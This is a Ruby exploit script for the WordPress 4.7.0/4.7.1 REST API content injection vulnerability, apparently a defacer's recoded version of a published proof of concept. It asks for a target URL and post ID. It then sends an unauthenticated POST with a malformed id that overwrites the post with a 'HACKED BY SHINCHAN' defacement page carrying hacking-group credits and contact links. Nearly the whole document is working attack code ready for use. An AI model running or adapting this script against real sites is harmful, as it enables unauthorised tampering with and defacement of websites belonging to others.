WordPress 4.7.0/4.7.1 Content Injection - recoded by ShinCha

1. # Exploit Title: WP Content Injection
2. # Date: 31 Jan' 2017
3. # Exploit Author: Harsh Jaiswal
4. # Vendor Homepage: http://wordpress.org
5. # Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
6. # Tested on: Backbox ubuntu Linux
7. # Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
8. # Credits : Marc, Sucuri, Brute
9. # usage : gem install rest-client
10. # Lang : Ruby
11.  
12.  
13. require 'rest-client'
14. require 'json'
15. puts "Enter Target URI (With wp directory)"
16. targeturi = gets.chomp
17. puts "Enter Post ID"
18. postid = gets.chomp.to_i
19. response = RestClient.post(
20.   "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
21.   {
22.  
23.     "id" => "#{postid}justrawdata",
24.     "slug" => "shinchan",
25.     "title" => "HACKED BY SHINCHAN",
26.     "content" => "<div style='text-align: center'><font size='6' face='impact'>Hacked by ShinChan ft. BrokenAngel - Indonesian People<br><img src='https://3.bp.blogspot.com/-nqnjEBoD6jY/WMqCazUxJtI/AAAAAAAAD68/93_l7CGtKaMr5ojhFvLAC4UdWZ2VZSJOQCLcB/s1600/hacked_by_shinchan.png'  \/><\/div><br><div style='text-align: center'><font size='4'>Thanks To :<br>N45HT - Indonesian Freedom Security - IndoXploit Coders Team - Gantengers Crew</font></font><br><font size='4'>n45ht.web.id - fb.com/N45HTOfficial - fb.com/groups/N45HTOfficial - fb.com/ShinChan.admin - fb.com/shinchan.n45ht - shinchan0x1945@gmail.com</font>"
27.  
28.  
29.   }.to_json,
30.   :content_type => :json,
31.   :accept => :json
32. ) {|response, request, result| response }
33. if(response.code == 200)
34.  
35. puts "Done! '#{targeturi}/index.php?p=#{postid}'"
36.  
37.  
38. else
39. puts "This site is not Vulnerable"
40. end